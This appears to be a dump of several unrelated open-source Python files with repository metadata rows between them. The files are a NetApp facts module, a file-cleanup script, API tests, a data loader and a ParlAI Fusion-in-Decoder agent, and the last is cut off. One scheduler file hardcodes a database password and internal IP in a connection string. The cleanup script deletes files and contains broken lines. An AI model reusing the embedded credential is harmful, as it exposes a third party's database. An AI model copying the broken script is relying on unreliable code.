link_status=iface['ib']['linkState'],
mtu=iface['ib']['maximumTransmissionUnit'],
current_interface_speed=strip_interface_speed(iface['ib']['currentSpeed']),
maximum_interface_speed=strip_interface_speed(iface['ib']['supportedSpeed']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'ib'],
iscsi=[dict(controller=controller_reference_label[controller['controllerRef']],
iqn=iface['iscsi']['iqn'],
link_status=iface['iscsi']['interfaceData']['ethernetData']['linkStatus'],
ipv4_enabled=iface['iscsi']['ipv4Enabled'],
ipv4_address=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4Address'],
ipv4_subnet_mask=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4SubnetMask'],
ipv4_gateway=iface['iscsi']['ipv4Data']['ipv4AddressData']['ipv4GatewayAddress'],
ipv6_enabled=iface['iscsi']['ipv6Enabled'],
mtu=iface['iscsi']['interfaceData']['ethernetData']['maximumFramePayloadSize'],
current_interface_speed=strip_interface_speed(iface['iscsi']['interfaceData']
['ethernetData']['currentInterfaceSpeed']),
supported_interface_speeds=strip_interface_speed(iface['iscsi']['interfaceData']
['ethernetData']
['supportedInterfaceSpeeds']))
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'iscsi'],
sas=[dict(controller=controller_reference_label[controller['controllerRef']],
channel=iface['sas']['channel'],
current_interface_speed=strip_interface_speed(iface['sas']['currentInterfaceSpeed']),
maximum_interface_speed=strip_interface_speed(iface['sas']['maximumInterfaceSpeed']),
link_status=iface['sas']['iocPort']['state'])
for controller in array_facts['controller']
for iface in controller['hostInterfaces']
if iface['interfaceType'] == 'sas'])]
facts['netapp_driveside_interfaces'] = [
dict(
controller=controller_reference_label[controller['controllerRef']],
interface_type=interface['interfaceType'],
interface_speed=strip_interface_speed(
interface[interface['interfaceType']]['maximumInterfaceSpeed']
if (interface['interfaceType'] == 'sata' or
interface['interfaceType'] == 'sas' or
interface['interfaceType'] == 'fibre')
else (
interface[interface['interfaceType']]['currentSpeed']
if interface['interfaceType'] == 'ib'
else (
interface[interface['interfaceType']]['interfaceData']['maximumInterfaceSpeed']
if interface['interfaceType'] == 'iscsi' else 'unknown'
))),
)
for controller in array_facts['controller']
for interface in controller['driveInterfaces']]
facts['netapp_storage_pools'] = [
dict(
id=storage_pool['id'],
name=storage_pool['name'],
available_capacity=storage_pool['freeSpace'],
total_capacity=storage_pool['totalRaidedSpace'],
used_capacity=storage_pool['usedSpace']
) for storage_pool in array_facts['volumeGroup']]
all_volumes = list(array_facts['volume'])
facts['netapp_volumes'] = [
dict(
id=v['id'],
name=v['name'],
parent_storage_pool_id=v['volumeGroupRef'],
capacity=v['capacity'],
is_thin_provisioned=v['thinProvisioned'],
workload=v['metadata'],
) for v in all_volumes]
workload_tags = None
try:
rc, workload_tags = self.request("storage-systems/%s/workloads" % self.ssid)
except Exception as error:
self.module.fail_json(msg="Failed to retrieve workload tags. Array [%s]." % self.ssid)
facts['netapp_workload_tags'] = [
dict(
id=workload_tag['id'],
name=workload_tag['name'],
attributes=workload_tag['workloadAttributes']
) for workload_tag in workload_tags]
# Create a dictionary of volume lists keyed by host names
facts['netapp_volumes_by_initiators'] = dict()
for mapping in array_facts['storagePoolBundle']['lunMapping']:
for host in facts['netapp_hosts']:
if mapping['mapRef'] == host['hosts_reference'] or mapping['mapRef'] == host['group_id']:
if host['name'] not in facts['netapp_volumes_by_initiators'].keys():
facts['netapp_volumes_by_initiators'].update({host['name']: []})
for volume in all_volumes:
if mapping['id'] in [volume_mapping['id'] for volume_mapping in volume['listOfMappings']]:
# Determine workload name if there is one
workload_name = ""
metadata = dict()
for volume_tag in volume['metadata']:
if volume_tag['key'] == 'workloadId':
for workload_tag in facts['netapp_workload_tags']:
if volume_tag['value'] == workload_tag['id']:
workload_name = workload_tag['name']
metadata = dict((entry['key'], entry['value'])
for entry in workload_tag['attributes']
if entry['key'] != 'profileId')
facts['netapp_volumes_by_initiators'][host['name']].append(
dict(name=volume['name'],
id=volume['id'],
wwn=volume['wwn'],
workload_name=workload_name,
meta_data=metadata))
features = [feature for feature in array_facts['sa']['capabilities']]
features.extend([feature['capability'] for feature in array_facts['sa']['premiumFeatures']
if feature['isEnabled']])
features = list(set(features)) # ensure unique
features.sort()
facts['netapp_enabled_features'] = features
return facts
def get_facts(self):
"""Get the embedded or web services proxy information."""
facts = self.get_array_facts()
self.module.log("isEmbedded: %s" % self.is_embedded())
self.module.log(pformat(facts))
self.module.exit_json(msg="Gathered facts for storage array. Array ID: [%s]." % self.ssid,
storage_array_facts=facts)
def strip_interface_speed(speed):
"""Converts symbol interface speeds to a more common notation. Example: 'speed10gig' -> '10g'"""
if isinstance(speed, list):
result = [match(r"speed[0-9]{1,3}[gm]", sp) for sp in speed]
result = [sp.group().replace("speed", "") if result else "unknown" for sp in result if sp]
result = ["auto" if match(r"auto", sp) else sp for sp in result]
else:
result = match(r"speed[0-9]{1,3}[gm]", speed)
result = result.group().replace("speed", "") if result else "unknown"
result = "auto" if match(r"auto", result.lower()) else result
return result
def main():
facts = Facts()
facts.get_facts()
if __name__ == "__main__":
main()
| [
"joshuamadison+gh@gmail.com"
] | joshuamadison+gh@gmail.com |
6c5e8cedaeaf654434fed411879ce389caf2ef64 | 7a48e285f1466716c6c7a3a729fadcf6c1a3d95f | /clean.py | f612c1619ba45b8f8fcf8f22946a99b39e1a1603 | [] | no_license | Bunty9/GPT | 5af356b67d808c14c4007575ba3d95ac3c0c7183 | eca0c828e6afd505b4303b8a6e68cd31e9b1eecd | refs/heads/master | 2023-08-13T07:59:43.312877 | 2021-09-26T13:04:53 | 2021-09-26T13:04:53 | 410,554,350 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 690 | py | import os
from curtsies.fmtfuncs import red, bold, green, on_blue, yellow, cyan
import time
from tqdm import tqdm
d = "repos"
for dirpath, dirnames, filenames in tqdm(os.walk(d)):
for f in filenames:
fullpath = os.path.join(dirpath,f)
# print(fullpath)
if fullpath.endswith(".py"):
#print(green(f"Keeping ... {fullpath}"))
print(f.os.stat.st_size)
pass
break
else:
#print(red(f"Deleting ... {fullpath}"))
if d in fullpath:
os.remove(fullpath)
else:
print(yellow("Something is wrong"))
time.sleep(60)
| [
"cbipin2000@gmail.com"
] | cbipin2000@gmail.com |
3c2f173df59757b124d49841d2ebabfcab8e6a8e | f7ee7727dcf87140b509a8b11db8a118bf7b10ee | /api/app/tags/tests.py | cfabdc5626e2a7fbd8ab6110200e297cba93d0b3 | [
"Apache-2.0"
] | permissive | hamzzy/Baobab | 874fc0e25d2b4428fb4d3204566a061f895cb185 | 91151fa25c49d4d66b527678fd768906dbc55053 | refs/heads/master | 2023-06-07T00:02:52.804996 | 2021-06-17T20:58:19 | 2021-06-17T21:02:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,038 | py | import json
from app.utils.testing import ApiTestCase
from app.tags.models import Tag, TagTranslation
from app import db
class ReviewsApiTest(ApiTestCase):
def seed_static_data(self):
self.event1 = self.add_event(key='event1')
self.event2 = self.add_event(key='event2')
self.user1 = self.add_user('event1admin@mail.com')
self.user2 = self.add_user('event2admin@mail.com')
self.user3 = self.add_user('user@mail.com')
self.event1.add_event_role('admin', self.user1.id)
self.event2.add_event_role('admin', self.user2.id)
db.session.commit()
self.tags = [
Tag(self.event1.id),
Tag(self.event1.id),
Tag(self.event2.id)
]
db.session.add_all(self.tags)
db.session.commit()
tag_translations = [
TagTranslation(self.tags[0].id, 'en', 'English Tag 1 Event 1'),
TagTranslation(self.tags[0].id, 'fr', 'French Tag 1 Event 1'),
TagTranslation(self.tags[1].id, 'en', 'English Tag 2 Event 1'),
TagTranslation(self.tags[1].id, 'fr', 'French Tag 2 Event 1'),
TagTranslation(self.tags[2].id, 'en', 'English Tag 1 Event 2')
]
db.session.add_all(tag_translations)
db.session.commit()
self.user1_headers = self.get_auth_header_for('event1admin@mail.com')
self.user2_headers = self.get_auth_header_for('event2admin@mail.com')
self.user3_headers = self.get_auth_header_for('user@mail.com')
def test_get_tag(self):
"""Test typical get request."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(data['id'], 1)
self.assertEqual(data['event_id'], 1)
self.assertDictEqual(data['name'], {
'en': 'English Tag 1 Event 1',
'fr': 'French Tag 1 Event 1'
})
def test_get_event_admin(self):
"""Check a non event admin can't get a tag."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user3_headers, data=params)
self.assertEqual(response.status_code, 403)
def test_get_event_admin_correct_event(self):
"""Check that an event admin for a different event can't get a tag."""
self.seed_static_data()
params = {'id': 1, 'event_id': 1}
response = self.app.get('/api/v1/tag', headers=self.user2_headers, data=params)
self.assertEqual(response.status_code, 403)
def test_typical_post(self):
"""Test a typical post request."""
self.seed_static_data()
params = {
'event_id': 2,
'name': {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2',
}
}
response = self.app.post(
'/api/v1/tag',
headers=self.user2_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 201)
data = json.loads(response.data)
new_id = data['id']
response = self.app.get('/api/v1/tag', headers=self.user2_headers, data={'id': new_id, 'event_id': 2})
data = json.loads(response.data)
self.assertEqual(data['id'], new_id)
self.assertEqual(data['event_id'], 2)
self.assertDictEqual(data['name'], {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2'
})
def test_post_event_admin(self):
"""Test that a non-event admin can't post a new tag."""
self.seed_static_data()
params = {
'event_id': 2,
'name': {
'en': 'English Tag 2 Event 2',
'fr': 'French Tag 2 Event 2',
}
}
# User 1 is not an event admin for event 2
response = self.app.post(
'/api/v1/tag',
headers=self.user1_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 403)
def test_put(self):
"""Test typcial put request."""
self.seed_static_data()
params = {
'id': 2,
'event_id': 1,
'name': {
'en': 'Renamed English Name', # Rename
'zu': 'Zulu Name'
}
}
response = self.app.put(
'/api/v1/tag',
headers=self.user1_headers,
data=json.dumps(params),
content_type='application/json')
self.assertEqual(response.status_code, 200)
response = self.app.get('/api/v1/tag', headers=self.user1_headers, data={'id': 2, 'event_id': 1})
data = json.loads(response.data)
self.assertEqual(data['id'], 2)
self.assertEqual(data['event_id'], 1)
self.assertDictEqual(data['name'], {
'en': 'Renamed English Name',
'zu': 'Zulu Name'
})
def test_tag_list(self):
"""Test that a list of tags can be retrieved in the correct language."""
self.seed_static_data()
params = {
'event_id': 1,
'language': 'en'
}
response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 2)
self.assertEqual(data[0]['id'], 1)
self.assertEqual(data[0]['event_id'], 1)
self.assertEqual(data[0]['name'], 'English Tag 1 Event 1')
self.assertEqual(data[1]['id'], 2)
self.assertEqual(data[1]['event_id'], 1)
self.assertEqual(data[1]['name'], 'English Tag 2 Event 1')
params = {
'event_id': 1,
'language': 'fr'
}
response = self.app.get('/api/v1/tags', headers=self.user1_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 2)
self.assertEqual(data[0]['id'], 1)
self.assertEqual(data[0]['event_id'], 1)
self.assertEqual(data[0]['name'], 'French Tag 1 Event 1')
self.assertEqual(data[1]['id'], 2)
self.assertEqual(data[1]['event_id'], 1)
self.assertEqual(data[1]['name'], 'French Tag 2 Event 1')
def test_tag_list_default_language(self):
"""Test that the language defaults to English when not found."""
self.seed_static_data()
params = {
'event_id': 2,
'language': 'zu'
}
response = self.app.get('/api/v1/tags', headers=self.user2_headers, data=params)
data = json.loads(response.data)
self.assertEqual(len(data), 1)
self.assertEqual(data[0]['id'], 3)
self.assertEqual(data[0]['event_id'], 2)
self.assertEqual(data[0]['name'], 'English Tag 1 Event 2')
| [
"avi@avi-net.co.za"
] | avi@avi-net.co.za |
3544578b5eba352958bb896b645b4312ea39834f | 769c8cac5aea3c9cb1e7eeafb1e37dbe9ea4d649 | /TaskScheduler/hotel_list_task.py | 0bee18d0d9cf36192d1c2f1f2dd5ddf676443a6a | [] | no_license | 20113261/p_m | f0b93b516e4c377aaf8b1741671759822ee0ec1a | ca7713de005c4c10e5cae547851a38a13211b71d | refs/heads/master | 2020-03-20T01:03:29.785618 | 2018-03-17T11:06:49 | 2018-03-17T11:06:49 | 137,065,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2017/7/11 下午5:30
# @Author : Hou Rong
# @Site :
# @File : hotel_list_task.py
# @Software: PyCharm
import Common.DateRange
import dataset
from Common.DateRange import dates_tasks
from TaskScheduler.TaskInsert import InsertTask
Common.DateRange.DATE_FORMAT = '%Y%m%d'
db = dataset.connect('mysql+pymysql://reader:mioji1109@10.19.118.147/source_info?charset=utf8')
if __name__ == '__main__':
with InsertTask(worker='hotel_list', task_name='ctrip_hotel_list_0711') as it:
for line in db.query('''SELECT city_id
FROM hotel_suggestions_city
WHERE source = 'ctrip' AND select_index != -1 AND annotation != -1;'''):
city_id = line['city_id']
for day in dates_tasks(90, day_step=10, ignore_days=20):
args = {'source': 'ctrip', 'city_id': city_id, 'check_in': day,
'part': '20170711'}
it.insert_task(args)
| [
"nmghr9@gmail.com"
] | nmghr9@gmail.com |
7ac936ecd5083f62b8a3b206f7e560a01d51ac58 | e0a9dcd4f53aa6bf4472efe451e226663212abda | /core/execute.py | d8d444c3f1a16fa7af00f3de0f4f8ca5d7541d09 | [] | no_license | dilawar/ghonchu | f0505dce8ba76402e7c58c7fc4efd0412ce3503a | 5527b4d444f113b0ab51f758fc809e8ab81c5a72 | refs/heads/master | 2016-09-02T05:33:07.167106 | 2014-12-12T12:07:50 | 2014-12-12T12:07:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 515 | py |
"""execute.py: Execute core action.
Last modified: Sat Jan 18, 2014 05:01PM
"""
__author__ = "Dilawar Singh"
__copyright__ = "Copyright 2013, Dilawar Singh and NCBS Bangalore"
__credits__ = ["NCBS Bangalore"]
__license__ = "GNU GPL"
__version__ = "1.0.0"
__maintainer__ = "Dilawar Singh"
__email__ = "dilawars@ncbs.res.in"
__status__ = "Development"
from notes import note
def new_note(title):
n = note.Note(title)
n.write()
| [
"dilawars@ncbs.res.in"
] | dilawars@ncbs.res.in |
cf1dd697de86f1bd9befeb47c8cb1caa88300d4e | 35823cfdaebca1364f0cfd0993c4e0c3b5dcf762 | /assignment3/cs231n/data_utils.py | 7a5e5d79a6a0ff754fca40361b812d22da6905c0 | [] | no_license | Richardyu114/CS231N-notes-and-assignments | b072e693a6766694fe7a2642de50a52c11fbfe0d | 25b9dac4834fabebc6d9453722bef6e5bea66b0c | refs/heads/master | 2021-03-07T06:53:18.840432 | 2020-07-08T13:33:00 | 2020-07-08T13:33:00 | 246,252,293 | 1 | 0 | null | 2020-11-18T22:43:24 | 2020-03-10T08:58:02 | Jupyter Notebook | UTF-8 | Python | false | false | 9,179 | py | from __future__ import print_function
from builtins import range
from six.moves import cPickle as pickle
import numpy as np
import os
from scipy.misc import imread
import platform
def load_pickle(f):
version = platform.python_version_tuple()
if version[0] == '2':
return pickle.load(f)
elif version[0] == '3':
return pickle.load(f, encoding='latin1')
raise ValueError("invalid python version: {}".format(version))
def load_CIFAR_batch(filename):
""" load single batch of cifar """
with open(filename, 'rb') as f:
datadict = load_pickle(f)
X = datadict['data']
Y = datadict['labels']
X = X.reshape(10000, 3, 32, 32).transpose(0,2,3,1).astype("float")
Y = np.array(Y)
return X, Y
def load_CIFAR10(ROOT):
""" load all of cifar """
xs = []
ys = []
for b in range(1,6):
f = os.path.join(ROOT, 'data_batch_%d' % (b, ))
X, Y = load_CIFAR_batch(f)
xs.append(X)
ys.append(Y)
Xtr = np.concatenate(xs)
Ytr = np.concatenate(ys)
del X, Y
Xte, Yte = load_CIFAR_batch(os.path.join(ROOT, 'test_batch'))
return Xtr, Ytr, Xte, Yte
def get_CIFAR10_data(num_training=49000, num_validation=1000, num_test=1000,
subtract_mean=True):
"""
Load the CIFAR-10 dataset from disk and perform preprocessing to prepare
it for classifiers. These are the same steps as we used for the SVM, but
condensed to a single function.
"""
# Load the raw CIFAR-10 data
cifar10_dir = 'cs231n/datasets/cifar-10-batches-py'
X_train, y_train, X_test, y_test = load_CIFAR10(cifar10_dir)
# Subsample the data
mask = list(range(num_training, num_training + num_validation))
X_val = X_train[mask]
y_val = y_train[mask]
mask = list(range(num_training))
X_train = X_train[mask]
y_train = y_train[mask]
mask = list(range(num_test))
X_test = X_test[mask]
y_test = y_test[mask]
# Normalize the data: subtract the mean image
if subtract_mean:
mean_image = np.mean(X_train, axis=0)
X_train -= mean_image
X_val -= mean_image
X_test -= mean_image
# Transpose so that channels come first
X_train = X_train.transpose(0, 3, 1, 2).copy()
X_val = X_val.transpose(0, 3, 1, 2).copy()
X_test = X_test.transpose(0, 3, 1, 2).copy()
# Package data into a dictionary
return {
'X_train': X_train, 'y_train': y_train,
'X_val': X_val, 'y_val': y_val,
'X_test': X_test, 'y_test': y_test,
}
def load_tiny_imagenet(path, dtype=np.float32, subtract_mean=True):
"""
Load TinyImageNet. Each of TinyImageNet-100-A, TinyImageNet-100-B, and
TinyImageNet-200 have the same directory structure, so this can be used
to load any of them.
Inputs:
- path: String giving path to the directory to load.
- dtype: numpy datatype used to load the data.
- subtract_mean: Whether to subtract the mean training image.
Returns: A dictionary with the following entries:
- class_names: A list where class_names[i] is a list of strings giving the
WordNet names for class i in the loaded dataset.
- X_train: (N_tr, 3, 64, 64) array of training images
- y_train: (N_tr,) array of training labels
- X_val: (N_val, 3, 64, 64) array of validation images
- y_val: (N_val,) array of validation labels
- X_test: (N_test, 3, 64, 64) array of testing images.
- y_test: (N_test,) array of test labels; if test labels are not available
(such as in student code) then y_test will be None.
- mean_image: (3, 64, 64) array giving mean training image
"""
# First load wnids
with open(os.path.join(path, 'wnids.txt'), 'r') as f:
wnids = [x.strip() for x in f]
# Map wnids to integer labels
wnid_to_label = {wnid: i for i, wnid in enumerate(wnids)}
# Use words.txt to get names for each class
with open(os.path.join(path, 'words.txt'), 'r') as f:
wnid_to_words = dict(line.split('\t') for line in f)
for wnid, words in wnid_to_words.items():
wnid_to_words[wnid] = [w.strip() for w in words.split(',')]
class_names = [wnid_to_words[wnid] for wnid in wnids]
# Next load training data.
X_train = []
y_train = []
for i, wnid in enumerate(wnids):
if (i + 1) % 20 == 0:
print('loading training data for synset %d / %d'
% (i + 1, len(wnids)))
# To figure out the filenames we need to open the boxes file
boxes_file = os.path.join(path, 'train', wnid, '%s_boxes.txt' % wnid)
with open(boxes_file, 'r') as f:
filenames = [x.split('\t')[0] for x in f]
num_images = len(filenames)
X_train_block = np.zeros((num_images, 3, 64, 64), dtype=dtype)
y_train_block = wnid_to_label[wnid] * \
np.ones(num_images, dtype=np.int64)
for j, img_file in enumerate(filenames):
img_file = os.path.join(path, 'train', wnid, 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
## grayscale file
img.shape = (64, 64, 1)
X_train_block[j] = img.transpose(2, 0, 1)
X_train.append(X_train_block)
y_train.append(y_train_block)
# We need to concatenate all training data
X_train = np.concatenate(X_train, axis=0)
y_train = np.concatenate(y_train, axis=0)
# Next load validation data
with open(os.path.join(path, 'val', 'val_annotations.txt'), 'r') as f:
img_files = []
val_wnids = []
for line in f:
img_file, wnid = line.split('\t')[:2]
img_files.append(img_file)
val_wnids.append(wnid)
num_val = len(img_files)
y_val = np.array([wnid_to_label[wnid] for wnid in val_wnids])
X_val = np.zeros((num_val, 3, 64, 64), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'val', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_val[i] = img.transpose(2, 0, 1)
# Next load test images
# Students won't have test labels, so we need to iterate over files in the
# images directory.
img_files = os.listdir(os.path.join(path, 'test', 'images'))
X_test = np.zeros((len(img_files), 3, 64, 64), dtype=dtype)
for i, img_file in enumerate(img_files):
img_file = os.path.join(path, 'test', 'images', img_file)
img = imread(img_file)
if img.ndim == 2:
img.shape = (64, 64, 1)
X_test[i] = img.transpose(2, 0, 1)
y_test = None
y_test_file = os.path.join(path, 'test', 'test_annotations.txt')
if os.path.isfile(y_test_file):
with open(y_test_file, 'r') as f:
img_file_to_wnid = {}
for line in f:
line = line.split('\t')
img_file_to_wnid[line[0]] = line[1]
y_test = [wnid_to_label[img_file_to_wnid[img_file]]
for img_file in img_files]
y_test = np.array(y_test)
mean_image = X_train.mean(axis=0)
if subtract_mean:
X_train -= mean_image[None]
X_val -= mean_image[None]
X_test -= mean_image[None]
return {
'class_names': class_names,
'X_train': X_train,
'y_train': y_train,
'X_val': X_val,
'y_val': y_val,
'X_test': X_test,
'y_test': y_test,
'class_names': class_names,
'mean_image': mean_image,
}
def load_models(models_dir):
"""
Load saved models from disk. This will attempt to unpickle all files in a
directory; any files that give errors on unpickling (such as README.txt)
will be skipped.
Inputs:
- models_dir: String giving the path to a directory containing model files.
Each model file is a pickled dictionary with a 'model' field.
Returns:
A dictionary mapping model file names to models.
"""
models = {}
for model_file in os.listdir(models_dir):
with open(os.path.join(models_dir, model_file), 'rb') as f:
try:
models[model_file] = load_pickle(f)['model']
except pickle.UnpicklingError:
continue
return models
def load_imagenet_val(num=None):
"""Load a handful of validation images from ImageNet.
Inputs:
- num: Number of images to load (max of 25)
Returns:
- X: numpy array with shape [num, 224, 224, 3]
- y: numpy array of integer image labels, shape [num]
- class_names: dict mapping integer label to class name
"""
imagenet_fn = 'cs231n/datasets/imagenet_val_25.npz'
if not os.path.isfile(imagenet_fn):
print('file %s not found' % imagenet_fn)
print('Run the following:')
print('cd cs231n/datasets')
print('bash get_imagenet_val.sh')
assert False, 'Need to download imagenet_val_25.npz'
f = np.load(imagenet_fn)
X = f['X']
y = f['y']
class_names = f['label_map'].item()
if num is not None:
X = X[:num]
y = y[:num]
return X, y, class_names
| [
"noreply@github.com"
] | noreply@github.com |
ac1d8d944c5f717513c16db9d6c67f9b7c3dbdf2 | 2176a24055451d189e1c1a9a87ef4eeefea681ec | /parlai/agents/fid/fid.py | 3e0e65079659d4846dedd5a7d66d649c96fb19f5 | [
"MIT"
] | permissive | khanhgithead/ParlAI | c4b7f9288702b20093a1821cfd6b48ab1b26b1ba | 598cd8cfb46f831c52237da97600d7849f2b711b | refs/heads/master | 2022-02-15T12:07:37.428392 | 2022-01-14T18:01:33 | 2022-01-14T18:01:33 | 157,932,342 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,924 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Leveraging Passage Retrieval with Generative Models for Open Domain Question Answering.
See https://arxiv.org/abs/2007.01282
"""
from abc import abstractmethod
from copy import deepcopy
import torch
import random
from typing import Tuple, Union, Optional, List, Dict, Any
from parlai.core.dict import DictionaryAgent
from parlai.core.opt import Opt
from parlai.core.message import Message
from parlai.agents.transformer.transformer import TransformerGeneratorModel
from parlai.agents.rag.args import RetrieverType
from parlai.agents.rag.modules import RagModel, Document, T5RagModel
from parlai.agents.rag.rag import RagAgent
from parlai.agents.rag.model_types import (
RagToken,
get_forced_decoder_inputs,
fix_incremental_state,
)
from parlai.utils.typing import TShared
import parlai.utils.logging as logging
from parlai.tasks.wizard_of_internet import constants as consts
class Fid(RagToken):
"""
FiD mimics RAG Token interface in many ways; we simply need to adjust the decoder
inputs to not repeat, as FiD attends over all encoder outputs jointly.
"""
def get_initial_forced_decoder_input(
self,
bsz: int,
inputs: torch.LongTensor,
n_docs: int,
start_idx: int,
end_idx: int,
input_turns_cnt: Optional[torch.LongTensor] = None,
) -> torch.Tensor:
return get_forced_decoder_inputs(
inputs, bsz, start_idx, end_idx, self.generation_model
)
def get_initial_decoder_input(self, input: torch.LongTensor) -> torch.LongTensor:
return input
def get_next_decoder_input(
self,
prev_input: torch.LongTensor,
selection: torch.LongTensor,
incr_state_inds: torch.LongTensor,
) -> torch.LongTensor:
prev_input = torch.index_select(prev_input, 0, incr_state_inds) # type: ignore
decoder_input = torch.cat([prev_input, selection], dim=-1)
return decoder_input # type: ignore
class FidModel(RagModel):
"""
The FiD Model is a simpler version of the RAG Model.
We override the encoder and decoder methods to join encoder outputs, and decode
normally, respectively.
"""
def __init__(self, opt: Opt, dictionary: DictionaryAgent, retriever_shared=None):
super().__init__(opt, dictionary, retriever_shared=retriever_shared)
self._rag_model_interface = Fid(opt, dictionary[dictionary.null_token])
self.embedding_size = opt['embedding_size']
def reorder_encoder_states(
self,
encoder_states: Tuple[torch.Tensor, ...],
indices: Union[List[int], torch.LongTensor],
) -> Tuple[torch.Tensor, torch.Tensor, List[List[Document]], torch.Tensor]:
"""
Override RagModel.reorder_encoder_states to make sure we only pass enc, mask.
See ``TorchGeneratorModel.reorder_encoder_states`` for a description.
"""
enc, mask, *_ = encoder_states
return TransformerGeneratorModel.reorder_encoder_states(
self, (enc, mask), indices
)
def reorder_decoder_incremental_state(
self, incremental_state: Dict[int, dict], inds: torch.Tensor
) -> Dict[int, dict]:
"""
Override RagModel.reorder_decoder_incremental_state to resort back to normal
reordering.
See ``TorchGeneratorModel.reorder_decoder_incremental_state`` for a description.
"""
incremental_state = fix_incremental_state(
self.generation_model, incremental_state
)
if not incremental_state:
return incremental_state
return {
idx: layer.reorder_incremental_state(incremental_state[idx], inds)
for idx, layer in enumerate(self.seq2seq_decoder.layers)
}
def encoder(
self,
input: torch.LongTensor,
input_lengths: torch.LongTensor,
query_vec: torch.LongTensor,
input_turns_cnt: torch.LongTensor,
positions: Optional[torch.LongTensor] = None,
segments: Optional[torch.LongTensor] = None,
) -> Tuple[
torch.Tensor,
torch.BoolTensor,
Optional[torch.LongTensor],
Optional[List[List[Document]]],
Optional[torch.Tensor],
]:
"""
Concatenate all encoder outputs in model forward.
:param input:
2D [bsz, seqlen] input to the encoder
:param input_lengths:
1D [bsz] lengths of each input item
:param query_vec:
2D [bsz*n_turns, seqlen] input for the retriever
:param input_turns_cnt:
1D [bsz] number of dialogue turns for each input example
:return (encoder_out, encoder_mask, input_turns_cnt, top_docs, top_doc_scores):
encoder_out: *concatenated* encoded representations of context/document pairs
encoder_mask: new mask for enc_out
input_turns_cnt: pass along the input turns count for the decoder
top_docs: List of top Documents for each batch example
top_doc_scores: scores for each retrieved document.
"""
enc_out, mask, input_turns_cnt, top_docs, top_doc_scores = super().encoder(
input, input_lengths, query_vec, input_turns_cnt, positions, segments
) # type: ignore
if input_turns_cnt is not None:
# Input Turns is a tensor of dim [bsz]
input = input.repeat_interleave(input_turns_cnt, dim=0) # type: ignore
new_out, new_mask = concat_enc_outs(
input, enc_out, mask, self.embedding_size, self.pad_idx
)
return new_out, new_mask, input_turns_cnt, top_docs, top_doc_scores
def decoder(
self,
input: torch.LongTensor,
encoder_state: Tuple[Any, ...],
incr_state: Optional[Dict[str, Any]] = None,
) -> Tuple[torch.Tensor, Optional[Dict[str, Any]]]:
"""
Decode, RAG-Style.
:param input:
input for the decoder
:param encoder_state:
RAG encoder states
:param incr_state:
incremental decoder state
:return (output, new_incr_state):
return the output token distribution, as well as new incremental state.
"""
enc_out, enc_mask, *_ = encoder_state
dec_out, incr_state = self.seq2seq_decoder(
input, (enc_out, enc_mask), incr_state
) # type: ignore
dec_out = self.decoder_output(dec_out)
return dec_out, incr_state
class T5FidModel(FidModel, T5RagModel):
def __init__(self, opt: Opt, dictionary: DictionaryAgent, retriever_shared=None):
super().__init__(opt, dictionary, retriever_shared=retriever_shared)
self.embedding_size = self.t5.model_dim
class FidAgent(RagAgent):
"""
Fusion in Decoder Agent.
Fusion in Decoder is very similar to RAG; each requires a retrieval and subsequent
generation step.
The difference is that FiD will encode all documents in parallel in encoder,
concatenate, and feed as one giant encoding to Decoder.
This forces the Decoder to attend over the several documents directly,
rather than marginalizing later.
As such, FidAgent is a natural extension of the RagAgent. I've extracted out to its
own agent for ease of use.
"""
@property
def rag_model_type(self) -> str:
return self._rag_model_type
@rag_model_type.setter
def rag_model_type(self, model: str):
self._rag_model_type = model
self._rag_model_interface = Fid(self.opt, self.NULL_IDX)
def build_model(self) -> FidModel:
if self.generation_model == 't5':
model = T5FidModel(self.opt, self.dict)
else:
model = FidModel(self.opt, self.dict)
if self.opt['embedding_type'] != 'random':
self._copy_embeddings(
model.encoder.embeddings.weight, self.opt['embedding_type']
)
return model
RETRIEVER_DOC_LEN_TOKENS = 256
class SearchQueryFiDAgent(FidAgent):
@classmethod
def add_cmdline_args(cls, parser, partial_opt=None):
super().add_cmdline_args(parser, partial_opt=partial_opt)
group = parser.add_argument_group('Search Query FiD Params')
# Search Query generator
group.add_argument(
'--search-query-generator-model-file',
type=str,
help='Path to a query generator model.',
)
group.add_argument(
'--search-query-generator-inference',
type=str,
default='greedy',
help='Generation algorithm for the search query generator model',
)
group.add_argument(
'--search-query-generator-beam-min-length',
type=int,
default=1,
help='The beam_min_length opt for the search query generator model',
)
group.add_argument(
'--search-query-generator-beam-size',
type=int,
default=1,
help='The beam_size opt for the search query generator model',
)
group.add_argument(
'--search-query-generator-text-truncate',
type=int,
default=512,
help='Truncates the input to the search query generator model',
)
# Creating chunks and spliting the documents
group.add_argument(
'--splitted-chunk-length',
type=int,
default=RETRIEVER_DOC_LEN_TOKENS,
help='The number of tokens in each document split',
)
group.add_argument(
'--doc-chunk-split-mode',
type=str,
choices=['word', 'token'],
default='word',
